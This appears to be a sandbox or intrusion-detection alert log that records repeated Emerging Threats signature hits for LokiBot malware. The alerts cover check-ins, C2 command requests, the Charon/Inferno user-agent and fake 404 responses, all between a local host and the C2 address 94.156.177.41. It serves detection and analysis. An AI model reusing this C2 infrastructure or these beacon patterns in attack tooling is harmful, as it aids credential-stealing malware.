                                                                                                                              2024-11-20T10:57:37.284752+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:37.284752+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:37.289801+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458492TCP
                                                                                                                              2024-11-20T10:57:37.558372+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:37.558372+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:37.558372+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:38.278254+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:38.278254+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:38.284188+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458493TCP
                                                                                                                              2024-11-20T10:57:38.444140+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:38.444140+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:38.444140+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:39.182621+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:39.182621+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:39.187672+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458495TCP
                                                                                                                              2024-11-20T10:57:39.350219+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:39.350219+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:39.350219+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:40.084264+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:40.084264+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:40.133545+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458497TCP
                                                                                                                              2024-11-20T10:57:40.390682+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:40.390682+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:40.390682+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:41.132330+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:41.132330+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:41.142696+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458498TCP
                                                                                                                              2024-11-20T10:57:41.280822+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45849994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:41.280822+01002025381ET MALWARE LokiBot Checkin1192.168.2.45849994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:41.280822+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45849994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.026338+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45849994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.026338+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45849994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.033745+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458499TCP
                                                                                                                              2024-11-20T10:57:42.194530+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.194530+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.194530+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.950176+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.950176+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:42.955102+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458500TCP
                                                                                                                              2024-11-20T10:57:43.109049+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:43.109049+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:43.109049+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:43.869492+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:43.869492+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:43.877806+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458501TCP
                                                                                                                              2024-11-20T10:57:44.036671+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.036671+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.036671+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.776690+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.776690+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.784399+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458502TCP
                                                                                                                              2024-11-20T10:57:44.953136+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.953136+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:44.953136+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:45.698675+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:45.698675+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:45.703555+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458503TCP
                                                                                                                              2024-11-20T10:57:45.861829+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:45.861829+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:45.861829+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:46.613808+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:46.613808+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:46.618695+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458504TCP
                                                                                                                              2024-11-20T10:57:46.774217+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:46.774217+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:46.774217+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:47.563624+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:47.563624+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:47.570860+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458505TCP
                                                                                                                              2024-11-20T10:57:47.730504+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:47.730504+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:47.730504+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:48.462037+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:48.462037+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:48.467331+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458506TCP
                                                                                                                              2024-11-20T10:57:48.614779+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:48.614779+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:48.614779+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:49.351507+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:49.351507+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850794.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:49.360365+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458507TCP
                                                                                                                              2024-11-20T10:57:49.520289+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:49.520289+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:49.520289+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:50.261043+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:50.261043+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:50.268579+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458508TCP
                                                                                                                              2024-11-20T10:57:50.448704+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45850994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:50.448704+01002025381ET MALWARE LokiBot Checkin1192.168.2.45850994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:50.448704+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45850994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:51.211483+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45850994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:51.211483+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45850994.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:51.219567+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458509TCP
                                                                                                                              2024-11-20T10:57:51.379035+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:51.379035+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:51.379035+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:52.132109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:52.132109+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:52.140914+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458510TCP
                                                                                                                              2024-11-20T10:57:52.282631+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:52.282631+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:52.282631+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.044496+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.044496+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851194.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.049334+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458511TCP
                                                                                                                              2024-11-20T10:57:53.201630+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.201630+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.201630+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.951456+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.951456+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851294.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:53.956364+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458512TCP
                                                                                                                              2024-11-20T10:57:54.109455+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:54.109455+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:54.109455+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:54.873081+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:54.873081+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851394.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:54.880536+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458513TCP
                                                                                                                              2024-11-20T10:57:55.033419+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:55.033419+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:55.033419+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:55.757238+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:55.757238+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:55.762200+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458514TCP
                                                                                                                              2024-11-20T10:57:56.039529+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.039529+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.039529+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.797067+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.797067+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851594.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.804995+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458515TCP
                                                                                                                              2024-11-20T10:57:56.955480+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.955480+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:56.955480+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:57.812611+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:57.812611+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851694.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:57.817446+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458516TCP
                                                                                                                              2024-11-20T10:57:57.984069+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45851894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:57.984069+01002025381ET MALWARE LokiBot Checkin1192.168.2.45851894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:57.984069+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45851894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:58.732769+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45851894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:58.732769+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45851894.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:58.738049+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458518TCP
                                                                                                                              2024-11-20T10:57:58.889596+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45852494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:58.889596+01002025381ET MALWARE LokiBot Checkin1192.168.2.45852494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:58.889596+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45852494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:59.631770+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45852494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:59.631770+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45852494.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:59.636685+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458524TCP
                                                                                                                              2024-11-20T10:57:59.787877+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45853094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:59.787877+01002025381ET MALWARE LokiBot Checkin1192.168.2.45853094.156.177.4180TCP
                                                                                                                              2024-11-20T10:57:59.787877+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45853094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:00.539641+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45853094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:00.539641+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45853094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:00.545760+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458530TCP
                                                                                                                              2024-11-20T10:58:00.691489+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45853694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:00.691489+01002025381ET MALWARE LokiBot Checkin1192.168.2.45853694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:00.691489+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45853694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:01.431288+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45853694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:01.431288+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45853694.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:01.438503+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458536TCP
                                                                                                                              2024-11-20T10:58:01.582641+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45854394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:01.582641+01002025381ET MALWARE LokiBot Checkin1192.168.2.45854394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:01.582641+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45854394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:02.329621+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45854394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:02.329621+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45854394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:02.348681+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458543TCP
                                                                                                                              2024-11-20T10:58:02.624665+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45855394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:02.624665+01002025381ET MALWARE LokiBot Checkin1192.168.2.45855394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:02.624665+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45855394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:03.354106+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45855394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:03.354106+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45855394.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:03.364160+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458553TCP
                                                                                                                              2024-11-20T10:58:03.519338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45855994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:03.519338+01002025381ET MALWARE LokiBot Checkin1192.168.2.45855994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:03.519338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45855994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:04.399422+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45855994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:04.399422+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45855994.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:04.406032+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458559TCP
                                                                                                                              2024-11-20T10:58:04.545050+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45856594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:04.545050+01002025381ET MALWARE LokiBot Checkin1192.168.2.45856594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:04.545050+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45856594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:05.306460+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45856594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:05.306460+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45856594.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:05.314152+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458565TCP
                                                                                                                              2024-11-20T10:58:05.453999+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45857294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:05.453999+01002025381ET MALWARE LokiBot Checkin1192.168.2.45857294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:05.453999+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45857294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:06.207266+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45857294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:06.207266+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45857294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:06.214440+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458572TCP
                                                                                                                              2024-11-20T10:58:06.367844+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45858294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:06.367844+01002025381ET MALWARE LokiBot Checkin1192.168.2.45858294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:06.367844+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45858294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:07.123685+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45858294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:07.123685+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45858294.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:07.131818+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458582TCP
                                                                                                                              2024-11-20T10:58:07.287006+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45858894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:07.287006+01002025381ET MALWARE LokiBot Checkin1192.168.2.45858894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:07.287006+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45858894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.022326+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45858894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.022326+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45858894.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.029885+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458588TCP
                                                                                                                              2024-11-20T10:58:08.176054+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45859494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.176054+01002025381ET MALWARE LokiBot Checkin1192.168.2.45859494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.176054+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45859494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.911860+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45859494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.911860+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.45859494.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:08.916984+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.458594TCP
                                                                                                                              2024-11-20T10:58:09.065860+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.45860094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:09.065860+01002025381ET MALWARE LokiBot Checkin1192.168.2.45860094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:09.065860+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.45860094.156.177.4180TCP
                                                                                                                              2024-11-20T10:58:09.796821+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.45860094.156.177.4180TCP
